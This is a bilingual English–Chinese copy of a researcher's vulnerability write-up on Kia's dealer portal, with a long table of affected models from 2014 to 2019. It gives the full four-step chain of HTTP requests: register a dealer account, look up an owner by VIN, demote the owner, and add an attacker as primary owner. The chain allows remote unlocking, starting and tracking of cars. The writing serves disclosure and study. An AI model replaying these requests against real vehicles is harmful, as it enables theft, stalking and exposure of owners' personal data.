2019 NIRO S Touring ✅️
2019 NIRO Touring ✅️
2019 K900 Luxury ✅️ ✅️ ✅️ ✅️
2019 K900 Luxury (VIP) ✅️ ✅️ ✅️ ✅️
2019 NIRO EV EX (Battery Heater) ✅️ ✅️ ✅️ ✅️
2019 NIRO EV EX ✅️ ✅️ ✅️ ✅️
2019 NIRO EV EX (Battery Heater, Wireless Charger) ✅️ ✅️ ✅️ ✅️
2019 NIRO EV EX Premium ✅️ ✅️ ✅️ ✅️
2019 NIRO EV EX Premium (Battery Heater) ✅️ ✅️ ✅️ ✅️
2019 NIRO EV EX Premium (Launch Ed.) ✅️ ✅️ ✅️ ✅️
2019 NIRO EV EX Premium (Launch Ed., Battery Heater) ✅️ ✅️ ✅️ ✅️
2019 NIRO PHEV EX ✅️ ✅️ ✅️ ✅️
2019 NIRO PHEV EX Premium ✅️ ✅️ ✅️ ✅️
2019 NIRO PHEV LX ✅️ ✅️ ✅️ ✅️
2019 OPTIMA EX ✅️ ✅️ ✅️ ✅️
2019 OPTIMA EX (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2019 OPTIMA EX AT (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2019 OPTIMA LX AT (Premium) ✅️ ✅️ ✅️
2019 OPTIMA S ✅️ ✅️ ✅️ ✅️
2019 OPTIMA SX Turbo ✅️ ✅️ ✅️ ✅️
2019 OPTIMA SX Turbo (Ltd) ✅️ ✅️ ✅️ ✅️
2019 OPTIMA HYBRID EX (Technology Pkg) ✅️
2019 OPTIMA PHEV EX ✅️ ✅️ ✅️ ✅️
2019 OPTIMA PHEV EX (Technology Pkg) ✅️ ✅️ ✅️ ✅️
2019 RIO S AT(4D/Technology Pkg)
2019 RIO S AT(5D/Technology Pkg)
2019 SEDONA EX
2019 SEDONA EX (Premium + Rear Ent.)
2019 SEDONA EX (Premium Pkg)
2019 SEDONA EX AT (Rear Ent. Sys)
2019 SEDONA S (Rear Ent. Sys) ✅️
2019 SEDONA SX ✅️
2019 SORENTO EX Sport
2019 SORENTO EX ✅️
2019 SORENTO EX (Touring Pkg) ✅️
2019 SORENTO Limited ✅️
2019 SORENTO EX (Touring) ✅️
2019 SORENTO LX (Convenience)
2019 SORENTO SX ✅️
2019 SOUL LX
2019 SOUL Exclaim ✅️
2019 SOUL Plus ✅️
2019 SPORTAGE EX (Premium Pkg + Technology Pkg) ✅️
2019 SPORTAGE EX (Sports Appearance Pkg)
2019 SPORTAGE EX
2019 SPORTAGE EX (Premium Pkg)
2019 SPORTAGE LX (Popular Pkg)
2019 SPORTAGE SX ✅️
2019 SPORTAGE SX (Turbo Pkg) ✅️
2019 SOUL EV Soul EV ✅️ ✅️ ✅️ ✅️
2019 SOUL EV Soul EV+ ✅️ ✅️ ✅️ ✅️
2019 STINGER GT
2019 STINGER Premium ✅️
2019 STINGER GT1 ✅️
2019 STINGER GT2 ✅️
2019 STINGER GTS ✅️
2019 STINGER Stinger
2019 STINGER Stinger (Sun and Sound) ✅️
2018 CADENZA Cadenza (Premium Pkg) ✅️
2018 CADENZA Limited ✅️
2018 CADENZA Premium (Luxury + Technology) ✅️
2018 FORTE EX
2018 FORTE EX
2018 FORTE EX (Premium Pkg + Technology Pkg) ✅️
2018 FORTE LX (Popular Pkg)
2018 FORTE LX
2018 FORTE SX AT
2018 FORTE S
2018 FORTE SX MT
2018 NIRO LX
2018 NIRO EX
2018 NIRO EX (Technology Pkg)
2018 NIRO EX (Premium Pkg) ✅️
2018 NIRO EX (Touring Pkg)
2018 NIRO FE
2018 NIRO Touring ✅️
2018 NIRO PHEV EX ✅️ ✅️ ✅️ ✅️
2018 NIRO PHEV EX Premium ✅️ ✅️ ✅️ ✅️
2018 NIRO PHEV LX ✅️ ✅️ ✅️ ✅️
2018 OPTIMA LX
2018 OPTIMA EX
2018 OPTIMA EX (Premium Pkg + Technology Pkg) ✅️
2018 OPTIMA S (Convenience)
2018 OPTIMA EX (Premium) ✅️
2018 OPTIMA LX (Convenience)
2018 OPTIMA LX Turbo
2018 OPTIMA S
2018 OPTIMA SX Turbo ✅️
2018 OPTIMA SX Turbo (Limited Pkg + Technology Pkg) ✅️
2018 OPTIMA SX Turbo (Technology Pkg) ✅️
2018 OPTIMA HYBRID LX
2018 OPTIMA HYBRID EX (Technology Pkg) ✅️
2018 OPTIMA HYBRID EX ✅️
2018 OPTIMA HYBRID LX (Convenience)
2018 RIO EX (4D)
2018 RIO EX (5D)
2018 SEDONA LX (Essentials + Adv Technology Pkg)
2018 SEDONA EX
2018 SEDONA LX (Essentials Pkg)
2018 SEDONA Limited ✅️
2018 SEDONA SX ✅️
2018 SORENTO EX
2018 SORENTO LX
2018 SORENTO EX (Touring Pkg)
2018 SORENTO Limited ✅️
2018 SORENTO EX Turbo
2018 SORENTO EX Turbo (Touring Pkg)
2018 SORENTO LX
2018 SORENTO LX (Convenience)
2018 SORENTO SX ✅️
2018 SOUL Exclaim AT (std + IP2) ✅️
2018 SOUL Plus AT
2018 SOUL Base AT
2018 SOUL Exclaim AT (SNS + TWS) ✅️
2018 SOUL Plus AT (UVO + AU + Primo) ✅️
2018 SOUL Plus AT
2018 SOUL Plus AT (UVO + AU) ✅️
2018 SOUL EV Soul EV ✅️ ✅️ ✅️ ✅️
2018 SOUL EV Soul EV+ ✅️ ✅️ ✅️ ✅️
2018 SPORTAGE EX (Premium Pkg)
2018 SPORTAGE EX
2018 SPORTAGE EX (Premium Pkg + Technology Pkg) ✅️
2018 SPORTAGE LX (Popular Pkg)
2018 SPORTAGE SX (Premium Pkg) ✅️
2018 STINGER GT1 ✅️
2018 STINGER GT ✅️
2018 STINGER GT2 ✅️
2018 STINGER LX
2018 STINGER Premium ✅️
2017 CADENZA Premium (Luxury + Technology) ✅️
2017 CADENZA Cadenza (Ltd) ✅️
2017 CADENZA Cadenza (Premium) ✅️
2017 FORTE S
2017 FORTE EX
2017 FORTE SX
2017 FORTE SX (Premium Technology Pkg) ✅️
2017 FORTE EX (Premium Technology Pkg) ✅️
2017 FORTE LX (Popular Pkg)
2017 FORTE S (Premium Pkg + Technology Pkg) ✅️
2017 FORTE S (Technology Pkg)
2017 FORTE KOUP EX ✅️
2017 FORTE KOUP SX ✅️
2017 FORTE KOUP SX (Manual Transmission) ✅️
2017 K900 Luxury V8 ✅️ ✅️ ✅️ ✅️
2017 K900 Luxury V8 (VIP Plus) ✅️ ✅️ ✅️ ✅️
2017 K900 Luxury ✅️ ✅️ ✅️ ✅️
2017 K900 Luxury (VIP) ✅️ ✅️ ✅️ ✅️
2017 K900 Premium ✅️ ✅️ ✅️ ✅️
2017 NIRO EX
2017 NIRO FE
2017 NIRO LX
2017 NIRO Touring ✅️
2017 OPTIMA EX
2017 OPTIMA LX Turbo (Technology Pkg) ✅️
2017 OPTIMA EX (Premium Pkg + Technology Pkg) ✅️
2017 OPTIMA EX (Premium Pkg) ✅️
2017 OPTIMA LX Turbo (Value)
2017 OPTIMA Limited Turbo ✅️
2017 OPTIMA SX Turbo ✅️
2017 OPTIMA SX Turbo (Premium Pkg + Technology Pkg) ✅️
2017 OPTIMA SX Turbo (Premium Pkg) ✅️
2017 OPTIMA HYBRID LX (Convenience)
2017 OPTIMA HYBRID EX ✅️
2017 OPTIMA HYBRID EX (Technology Pkg) ✅️
2017 OPTIMA HYBRID LX
2017 RIO EX (4D/Eco) ✅️
2017 RIO EX (5D/Eco) ✅️
2017 RIO SX (5D) ✅️
2017 OPTIMA PHEV EX ✅️ ✅️ ✅️ ✅️
2017 SEDONA EX
2017 SEDONA EX (Adv Technology Pkg)
2017 SEDONA LX (Essentials + Adv Technology Pkg)
2017 SEDONA LX (Essentials Premium Pkg)
2017 SEDONA LX (UVO Pkg)
2017 SEDONA Limited ✅️
2017 SEDONA SX ✅️
2017 SEDONA SX (Adv Touring Pkg) ✅️
2017 SORENTO EX
2017 SORENTO LX (Convenience + Essentials Premium Pkg)
2017 SORENTO EX (Touring Pkg)
2017 SORENTO Limited ✅️
2017 SORENTO LX (Convenience + Adv Technology Pkg)
2017 SORENTO LX (Convenience)
2017 SORENTO SX ✅️
2017 SOUL Exclaim
2017 SOUL Exclaim (Technology Pkg) ✅️
2017 SOUL Plus AT
2017 SOUL Plus AT (UVO + AU + Primo + S10) ✅️
2017 SOUL Plus AT (UVO + AU + Primo) ✅️
2017 SOUL Plus AT (UVO + AU) ✅️
2017 SOUL EV Soul EV ✅️ ✅️ ✅️ ✅️
2017 SOUL EV Soul EV+ ✅️ ✅️ ✅️ ✅️
2017 SPORTAGE LX (Popular Pkg + Cool Connected Pkg)
2017 SPORTAGE EX
2017 SPORTAGE EX (Premium Pkg + Technology Pkg) ✅️
2017 SPORTAGE EX (Premium Pkg)
2017 SPORTAGE SX (Premium Pkg) ✅️
2016 CADENZA Premium (Luxury + Technology) ✅️
2016 CADENZA Cadenza (Std) ✅️
2016 CADENZA Limited ✅️
2016 CADENZA Premium (Luxury) ✅️
2016 FORTE EX (Premium Technology Pkg) ✅️
2016 FORTE EX (Premium Pkg) ✅️
2016 FORTE EX (Premium Plus Pkg) ✅️
2016 FORTE SX (Premium Technology Pkg) ✅️
2016 FORTE KOUP EX (Premium Technology Pkg) ✅️
2016 FORTE KOUP SX (Premium Technology Pkg) ✅️
2016 K900 Luxury ✅️ ✅️ ✅️ ✅️
2016 K900 Luxury (VIP) ✅️ ✅️ ✅️ ✅️
2016 K900 Luxury V8 ✅️ ✅️ ✅️ ✅️
2016 K900 Luxury V8 (VIP Plus) ✅️ ✅️ ✅️ ✅️
2016 K900 Premium ✅️ ✅️ ✅️ ✅️
2016 K900 Premium(IHP) ✅️ ✅️ ✅️ ✅️
2016 K900 Luxury V8 (WV2,CPL) ✅️ ✅️ ✅️ ✅️
2016 K900 Premium(Std) ✅️ ✅️ ✅️ ✅️
2016 OPTIMA EX (Premium Pkg) ✅️
2016 OPTIMA EX (Premium Pkg + Technology Pkg) ✅️
2016 OPTIMA LX Turbo (Technology Pkg) ✅️
2016 OPTIMA Limited Turbo ✅️
2016 OPTIMA SX Turbo ✅️
2016 OPTIMA SX Turbo (Premium Pkg + Technology Pkg) ✅️
2016 OPTIMA SX Turbo (Premium Pkg) ✅️
2016 OPTIMA HYBRID LX (Convenience) ✅️
2016 OPTIMA HYBRID EX ✅️
2016 OPTIMA HYBRID EX (Technology Pkg) ✅️
2016 RIO EX (4D/Eco) ✅️
2016 RIO EX (5D/Eco) ✅️
2016 RIO SX (4D) ✅️
2016 RIO SX (5D) ✅️
2016 SEDONA EX ✅️
2016 SEDONA EX (Premium Pkg) ✅️
2016 SEDONA LX (Convenience) ✅️
2016 SEDONA Limited ✅️
2016 SEDONA SX ✅️
2016 SEDONA SX (Premium Pkg) ✅️
2016 SORENTO EX ✅️
2016 SORENTO EX (Premium Pkg) ✅️
2016 SORENTO Limited ✅️
2016 SORENTO EX (Premium Pkg + Touring Pkg) ✅️
2016 SORENTO LX ✅️
2016 SORENTO LX (Convenience) ✅️
2016 SORENTO SX ✅️
2016 SOUL Plus (Audio Pkg) ✅️
2016 SOUL Exclaim ✅️
2016 SOUL Exclaim (Premium Pkg) ✅️
2016 SOUL Plus (Primo Pkg) ✅️
2016 SOUL Plus (Signature 2.0 Sp. Ed.) ✅️
2016 SOUL Plus (Special Edition) ✅️
2016 SOUL EV Soul EV ✅️ ✅️ ✅️
2016 SOUL EV Soul EV+ ✅️ ✅️ ✅️
2016 SPORTAGE EX (Premium Pkg) ✅️
2016 SPORTAGE SX (Premium Pkg) ✅️
2015 CADENZA Limited ✅️
2015 CADENZA Premium (Luxury + Technology) ✅️
2015 CADENZA Premium (Luxury) ✅️
2015 CADENZA Premium (Std) ✅️
2015 FORTE EX (Premium Pkg + Technology Pkg + UVO Pkg) ✅️
2015 FORTE EX (Premium Pkg + UVO Pkg) ✅️
2015 FORTE EX (UVO Pkg) ✅️
2015 FORTE SX ✅️
2015 FORTE SX (Premium Pkg) ✅️
2015 FORTE LX (Popular Pkg + UVO Pkg) ✅️
2015 FORTE SX (Premium Pkg + Technology Pkg) ✅️
2015 FORTE KOUP SX ✅️
2015 FORTE KOUP EX (Premium Pkg + Technology Pkg) ✅️
2015 FORTE KOUP SX (Premium Pkg + Technology Pkg) ✅️
2015 FORTE KOUP SX (Premium Pkg) ✅️
2015 OPTIMA EX (Premium Pkg) ✅️
2015 OPTIMA EX (Premium Pkg + Technology Pkg) ✅️
2015 OPTIMA LX (Convenience Plus Pkg) ✅️
2015 OPTIMA Limited Turbo ✅️
2015 OPTIMA SX (Premium) ✅️
2015 OPTIMA SX Turbo (Premium Pkg + Technology Pkg) ✅️
2015 OPTIMA SX Turbo (Premium Pkg) ✅️
2015 OPTIMA HYBRID EX ✅️
2015 OPTIMA HYBRID EX (Technology Pkg) ✅️
2015 OPTIMA HYBRID LX (Convenience) ✅️
2015 OPTIMA HYBRID SX ✅️
2015 SEDONA SX ✅️
2015 SEDONA EX (Premium Plus Pkg) ✅️
2015 SEDONA EX (UVO Pkg) ✅️
2015 SEDONA LX ✅️
2015 SEDONA LX (Convenience) ✅️
2015 SEDONA Limited ✅️
2015 SEDONA SX (Premium Pkg) ✅️
2015 SORENTO EX ✅️
2015 SORENTO EX (Touring Pkg) ✅️
2015 SORENTO LX (Convenience) ✅️
2015 SORENTO Limited ✅️
2015 SORENTO SX ✅️
2015 SOUL Exclaim ✅️
2015 SOUL Exclaim (Sun & Sound Pkg) ✅️
2015 SOUL Automatic Transmission ✅️
2015 SOUL Exclaim (Sun & Sound Pkg + The Whole Shabang Pkg) ✅️
2015 SOUL Plus (Audio + UVO) ✅️
2015 SOUL Plus (UVO Pkg) ✅️
2015 SOUL EV Soul EV ✅️ ✅️ ✅️
2015 SOUL EV Soul EV+ ✅️ ✅️ ✅️
2015 SPORTAGE EX ✅️
2015 SPORTAGE EX (Premium Pkg) ✅️
2015 SPORTAGE LX (Popular Pkg) ✅️
2015 SPORTAGE LX (UVO Pkg) ✅️
2015 SPORTAGE SX (Premium Pkg) ✅️
2014 CADENZA Premium (Luxury) ✅️
2014 CADENZA Premium (Luxury + Technology) ✅️
2014 CADENZA Limited ✅️
2014 CADENZA Premium (Std) ✅️
2014 FORTE SX ✅️
2014 FORTE EX ✅️
2014 FORTE EX (Premium Pkg + Technology Pkg) ✅️
2014 FORTE SX (Premium Pkg + Technology Pkg) ✅️
2014 FORTE EX (Premium Pkg) ✅️
2014 FORTE SX (Premium Pkg) ✅️
2014 FORTE KOUP EX (Premium Pkg + Technology Pkg) ✅️
2014 FORTE KOUP SX (Premium Pkg) ✅️
2014 FORTE KOUP EX ✅️
2014 FORTE KOUP EX (Premium Pkg) ✅️
2014 FORTE KOUP SX ✅️
2014 FORTE KOUP SX (Premium Pkg + Technology Pkg) ✅️
2014 OPTIMA HYBRID EX (Premium Pkg + Technology Pkg) ✅️
2014 OPTIMA HYBRID LX (Convenience) ✅️
2014 SORENTO EX ✅️
2014 SORENTO EX (Touring Pkg) ✅️
2014 SORENTO LX (Convenience + Premium Pkg + Touring Pkg) ✅️
2014 SORENTO LX (Convenience + Premium Pkg) ✅️
2014 SORENTO LX (Convenience) ✅️
2014 SORENTO Limited ✅️
2014 SORENTO SX ✅️
2014 SOUL Exclaim ✅️
2014 SOUL Exclaim (Sun & Sound Pkg + The Whole Shabang Pkg) ✅️
2014 SOUL Plus (Audio + UVO Pkg) ✅️
2014 SOUL Plus (UVO Pkg) ✅️
2014 SPORTAGE EX (Premium Pkg) ✅️
2014 SPORTAGE LX (Popular Pkg) ✅️
2014 SPORTAGE EX ✅️
2014 SPORTAGE SX ✅️
2014 SPORTAGE SX (Premium Pkg) ✅️

Credit 信用

Vulnerability Writeup 漏洞记录

Around two years ago, a few hackers and I hunted for vulnerabilities on over a dozen different car companies. We discovered critical issues that would’ve allowed attackers to remotely locate, disable starters, unlock, and start an estimated 15.5 million vehicles. There was a big reaction to this. Paul Roberts, founder of The Security Ledger, even testified about these findings in a US congressional hearing.
大约两年前,我和一些黑客在十几家不同的汽车公司寻找漏洞。我们发现了一些关键问题,攻击者可以利用这些问题远程定位、禁用启动器、解锁和启动大约 1,550 万辆车辆。对此,引起了很大的反响。 The Security Ledger 的创始人 Paul Roberts甚至在美国国会听证会上就这些发现作证

Since so much time had passed, we decided to revisit a few of the larger companies to see if we couldn’t discover any new issues. The first one we spent time on was Kia.
由于已经过去了很长时间,我们决定重新访问一些较大的公司,看看是否无法发现任何新问题。我们花时间参观的第一个是起亚。

When we began looking at Kia, we originally focused on the owners.kia.com website and the Kia Connect iOS app com.myuvo.link. Both of these applications were interesting because they could execute internet-to-vehicle commands.
当我们开始关注 Kia 时,我们最初关注owners.kia.com网站和 Kia Connect iOS 应用程序com.myuvo.link 。这两个应用程序都很有趣,因为它们可以执行互联网到车辆的命令。

While the owners website and the mobile app served the same purpose, they handled vehicle commands differently. The owners website used a backend reverse-proxy to forward user commands to the api.owners.kia.com backend service that was actually responsible for actually executing vehicle commands, whereas the mobile app instead accessed this API directly.
虽然车主网站和移动应用程序具有相同的目的,但它们处理车辆命令的方式不同。车主网站使用后端反向代理将用户命令转发到api.owners.kia.com后端服务,该服务实际上负责实际执行车辆命令,而移动应用程序则直接访问此 API。

The following HTTP request shows how the owners.kia.com website will proxy an API request to the api.owners.kia.com host to unlock a car door.
以下 HTTP 请求显示owners.kia.com网站如何将 API 请求代理到api.owners.kia.com主机以解锁车门。

HTTP Request to Unlock Car Door on the “owners.kia.com” website
在“owners.kia.com”网站上解锁车门的 HTTP 请求

POST /apps/services/owners/apigwServlet.html HTTP/2
Host: owners.kia.com
Httpmethod: GET
Apiurl: /door/unlock
Servicetype: postLoginCustomer
Cookie: JSESSIONID=SESSION_TOKEN;

After sending the above HTTP request that originated from the owners.kia.com website, the Kia backend will generate a Sid session ID header that is consumed by the backend API using our JSESSIONID as auth, then finally send the forwarded HTTP request to the api.owners.kia.com website in the following format.
发送上述来自owners.kia.com网站的 HTTP 请求后,Kia 后端将生成一个Sid会话 ID 标头,后端 API 使用我们的JSESSIONID作为身份验证来使用该标头,然后最终将转发的 HTTP 请求发送到api.owners.kia.com网站采用以下格式。

HTTP Request Formed and Proxied by Server
由服务器形成并代理的 HTTP 请求

GET /apigw/v1/rems/door/unlock HTTP/1.1
Host: api.owners.kia.com
Sid: 454817d4-b228-4103-a26f-884e362e8dee
Vinkey: 3ecc1a19-aefd-4188-a7fe-1723e1663d6e

The important headers in the above HTTP request are the Sid (session token) and Vinkey (UUID that indexes to VIN). There are various other headers included that are all necessary to access the API itself, but those are the two related to vehicle access controls. Both of the above HTTP requests were in the same area we had found the original Kia vulnerabilities in 2023.
上述 HTTP 请求中的重要标头是Sid (会话令牌)和Vinkey (索引到 VIN 的 UUID)。还有各种其他标头,这些标头都是访问 API 本身所必需的,但这些是与车辆访问控制相关的两个标头。上述两个 HTTP 请求都位于我们于 2023 年发现的原始 Kia 漏洞的同一区域。

Since we were already super familiar with the user side of things, we decided to look at the Kia Dealer website instead.
由于我们已经非常熟悉用户方面的事情,因此我们决定查看起亚经销商网站。

Targeting Kia Dealer Infrastructure
针对起亚经销商基础设施

Something we’d never tested was how Kia actually performed vehicle activations for new purchases. After speaking to a few people, we learned that Kia would ask for your email address at the dealership and you’d receive a registration link to either register a new Kia account or add your newly purchased vehicle to your pre-existing Kia account.
我们从未测试过起亚如何实际执行新购买的车辆激活。在与一些人交谈后,我们了解到起亚会要求您在经销商处提供电子邮件地址,并且您会收到一个注册链接,用于注册新的起亚帐户或将您新购买的车辆添加到您预先存在的起亚帐户中。

We asked if they could share the registration links given to them by Kia, and nicely enough, they forwarded their emails. We copied the following URL from the hyperlink:
我们询问他们是否可以分享起亚提供给他们的注册链接,很好的是,他们转发了他们的电子邮件。我们从超链接中复制了以下 URL:

https://kiaconnect.kdealer.com/content/kDealer/en/kiauser.html?token=dealer_generated_access_token&vin=example_vin&scenarioType=3

Super interesting! The kiaconnect.kdealer.com domain was one we’d never seen before. We opened the URL and saw the following endpoint:
超级有趣! kiaconnect.kdealer.com域名是我们以前从未见过的域名。我们打开 URL 并看到以下端点:

Hacking Kia: Remotely Controlling Cars With Just a License Plate
Kiaconnect Initial Vehicle Registration URL
Kiaconnect 初始车辆注册 URL

 

In the above URL, the token parameter (otherwise known as a VIN Key) is an access token generated by a Kia dealer as a one-time grant to modify the vehicle specified in the vin parameter. After loading the above URL, the following HTTP request will be sent to validate that the token has not expired or been used.

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com

{
  "token": "985a49f0-1fe5-4d36-860e-d9b93272072b",
  "vin": "5XYP3DHC9NG310533",
  "scenarioType": 3,
  "loginPref": null
}

Very interesting. The HTTP request sent to validate the one-time access token was being sent to the same /apps/services/kdealer/apigwServlet.html URI as the previous owners.kia.com request, except this time, it was being sent on the Kia Connect dealer website. This likely meant that the dealer infrastructure had a similar forwarding proxy to an internal API for dealership functionality.
非常有趣。为验证一次性访问令牌而发送的 HTTP 请求被发送到同一地址 /apps/services/kdealer/apigwServlet.html URI 与之前的owners.kia.com请求相同,但这次是在 Kia Connect 经销商网站上发送的。这可能意味着经销商基础设施具有与经销商功能的内部 API 类似的转发代理。

We dug through the JavaScript looking for interesting APIGW calls and found what appeared to be employee-only functionality. There were references to dealer vehicle lookup, account lookup, enroll, unenroll, and many more dealer related API calls.
我们深入研究了 JavaScript,寻找有趣的 APIGW 调用,并发现了似乎仅限员工使用的功能。其中涉及经销商车辆查找、帐户查找、注册、取消注册以及更多与经销商相关的 API 调用。

dealerVehicleLookUp() {
    this.displayLoader = !0, this.vinToEnroll = "eDelivery" != this.entryPoint ? this.vinToEnroll.replace(/\s/g, "") : this.userDetails.vin, "17" == this.vinToEnroll.length && this.landingPageService.postOffice({
        vin: this.vinToEnroll
    }, "/dec/dlr/dvl", "POST", "postLoginCustomer").subscribe(i => {
        i && (i.hasOwnProperty("body") && "0" == i.body.status.statusCode ? this.processDvlData(i.body) : "1003" == i.body.status.errorCode && "kia-dealer" == this.entryPoint ? this.reRouteSessionExpire() : (this.displayLoader = !1, this.alertMessage = i.body.status.errorMessage, document.getElementById("triggerGeneralAlertModal").click()))
    })
}

To test if we could access any of these endpoints, we formed the HTTP request to the dealer APIGW endpoint with our own dealer token (Appid header) and the VIN of a vehicle that we owned.
为了测试我们是否可以访问这些端点中的任何一个,我们使用我们自己的经销商令牌( Appid标头)和我们拥有的车辆的 VIN 向经销商 APIGW 端点发出 HTTP 请求。

Attempted HTTP Request to Search VIN using Kia Dealer APIGW Endpoint
尝试使用 Kia Dealer APIGW Endpoint 搜索 VIN 的 HTTP 请求

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /dec/dlr/dvl

{
    "vin": "1HGBH41JXMN109186"
}

HTTP Response HTTP响应

HTTP/1.1 401 Unauthorized
Content-type: application/json

{
  "status": {
    "statusCode": 1,
    "errorType": 1,
    "errorCode": 1003,
    "errorMessage": "Session Key is either invalid or expired"
  }
}

Nope. It did not seem like the dealer endpoints wanted to work with the access token that was given to us via email when purchasing a new car.
没有。经销商端点似乎不想使用购买新车时通过电子邮件提供给我们的访问令牌。

We thought back to the original owners.kia.com website and then wondered: what if there was a way to just register as a dealer, generate an access token, then use that access token here? The kiaconnect.kdealer.com website seemed to have the same API format, so maybe we could just copy the format, register an account, and login?
我们回想起最初的owners.kia.com网站,然后想知道:如果有一种方法可以注册为经销商,生成访问令牌,然后在此处使用该访问令牌呢? kiaconnect.kdealer.com网站似乎有相同的 API 格式,所以也许我们可以复制格式,注册一个帐户,然后登录?

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /prof/registerUser

{
  "userCredential": {
    "firstName": "Sam",
    "lastName": "Curry",
    "userId": "[email protected]",
    "password": "FakePass123!",
    "acceptedTerms": 1
  }
}

It returned 200 OK! It seemed that we could register on the Kia Dealer website using the same HTTP request to register on the Kia Owners website. We quickly tried to login and generate an access token:
返回200 OK!看来我们可以使用与在 Kia Owners 网站上注册相同的 HTTP 请求在 Kia Dealer 网站上注册。我们快速尝试登录并生成访问令牌:

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /prof/authUser

{
  "userCredential": {
    "userId": "[email protected]",
    "password": "FakePass123!"
  }
}

The login was valid, the server returned an HTTP response with a session cookie.
登录有效,服务器返回带有会话 cookie 的 HTTP 响应。

HTTP/1.1 200 OK
Sid: 123e4567-e89b-12d3-a456-426614174000

We sent our generated access token to the previously unauthorized dealer APIGW endpoint to search a VIN.
我们将生成的访问令牌发送到之前未经授权的经销商 APIGW 端点以搜索 VIN。

HTTP Request to Search VIN using Kia Dealer APIGW Endpoint (with “dda” access token)
使用起亚经销商 APIGW 端点搜索 VIN 的 HTTP 请求(带有“dda”访问令牌)

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Appid: 123e4567-e89b-12d3-a456-426614174000
Apiurl: /dec/dlr/dvl

{
    "vin": "1HGBH41JXMN109186"
}

HTTP Response HTTP响应

HTTP/1.1 200 OK
Content-type: application/json

{
  "payload": {
    "billingSubscriptionSupported": 1,
    "digitalKeySupported": 0,
    "generation": "3",
    "profiles": [
      {
        "address": {},
        "billSubscriptionStatus": 1,
        "digitalKeyStatus": 0,
        "email": "[email protected]",
        "enrollmentReqStatus": 1,
        "enrollmentStatus": 1,
        "firstName": "yeet",
        "lastName": "yeet",
        "loginId": "[email protected]",
        "phone": "4027181388",
        "phoneType": 3,
        "wifiHotspotStatus": 0
      }
    ],
    "vinAddedToAccount": 1,
    "wifiHotspotSupported": 1
  }
}

After registering and authenticating to a dealer account, we were able to generate a valid access token that could be used to call the backend dealer APIs! The HTTP response contained the vehicle owner’s name, phone number, and email address. We were able to authenticate into the dealer portal using our normal app credentials and the modified channel header. This meant that we could likely hit all other dealer endpoints.
注册并验证经销商帐户后,我们能够生成有效的访问令牌,可用于调用后端经销商 API! HTTP 响应包含车主的姓名、电话号码和电子邮件地址。我们能够使用正常的应用程序凭据和修改后的通道标头对经销商门户进行身份验证。这意味着我们可能会触及所有其他经销商端点。

Taking Over Vehicles 接管车辆

After sifting through the JavaScript for a few hours, we finally learned how the enrollment, unenrollment, and vehicle modification endpoints worked. The following four HTTP requests could be sent in order to gain access to a victim’s vehicle.
经过几个小时的 JavaScript 筛选后,我们终于了解了注册、取消注册和车辆修改端点的工作原理。为了访问受害者的车辆,可以发送以下四个 HTTP 请求。

Hacking Kia: Remotely Controlling Cars With Just a License Plate
Full high level attack flow
完整的高级攻击流程

 

(1) Generate the Dealer Token and retrieve the “token” header from the HTTP Response
(1) 生成 Dealer Token 并从 HTTP 响应中检索“token”标头

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /prof/authUser

{
  "userCredential": {
    "userId": "[email protected]",
    "password": "Fakepass123!"
  }
}
  • Using the dealer account we created, we’ll auth through the /prof/authUser endpoint to obtain a session token.
    使用我们创建的经销商帐户,我们将通过/prof/authUser端点进行身份验证以获取会话令牌。

(2) Fetch Victim’s Email Address and Phone Number
(2) 获取受害者的电子邮件地址和电话号码

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /dec/dlr/dvl
Appid: 123e4567-e89b-12d3-a456-426614174000

{
  "vin": "VIN"
}
  • With the added session token header, we are able to access all dealer endpoints on the kiaconnect.kdealer.com website and can retrieve the victim’s name, phone number, and email.
    通过添加会话令牌标头,我们能够访问kiaconnect.kdealer.com网站上的所有经销商端点,并检索受害者的姓名、电话号码和电子邮件。

(3) Modify Owner’s Previous Access using Leaked Email Address and VIN number
(3) 使用泄露的电子邮件地址和 VIN 号码修改所有者之前的访问权限

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /dec/dlr/rvp
Appid: 123e4567-e89b-12d3-a456-426614174000

{
  "vin": "VIN",      
  "loginId": "[email protected]", 
  "dealerCode": "eDelivery"           
}
  • We send this request to demote the owner of the vehicle so that we can add ourselves as the primary account holders. We must send the victim’s email here, which we obtained in step two.
    我们发送此请求是为了将车主降级,以便我们可以将自己添加为主要帐户持有人。我们必须将受害者的电子邮件发送到此处,这是我们在第二步中获得的。

(4) Add Attacker to Victim Vehicle
(4) 将攻击者添加到受害者车辆上

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /ownr/dicve
Appid: 123e4567-e89b-12d3-a456-426614174000

{
  "vin": "5XYRK4LFXMG016215",
  "loginId": "[email protected]"
}
  • Finally, we’ll assign our attacker-controlled email as the primary owner of the vehicle. This will allow us to send arbitrary commands to the vehicle.
    最后,我们将把攻击者控制的电子邮件分配为车辆的主要所有者。这将使我们能够向车辆发送任意命令。

The above four HTTP requests could be used to send commands to pretty much any Kia vehicle made after 2013 (see “Vehicles Affected” table for specifics) using only the license plate.
上述四个 HTTP 请求可用于仅使用车牌向几乎所有 2013 年之后生产的 Kia 车辆发送命令(具体信息请参阅“受影响的车辆”表)。

From the victim’s side, there was no notification that their vehicle had been accessed nor their access permissions modified. An attacker could resolve someone’s license plate, enter their VIN through the API, then track them passively and send active commands like unlock, start, or honk.
从受害者的角度来看,没有任何通知表明他们的车辆已被访问,也没有通知他们的访问权限被修改。攻击者可以解析某人的车牌,通过 API 输入他们的 VIN,然后被动跟踪他们并发送主动命令,例如解锁、启动或按喇叭。

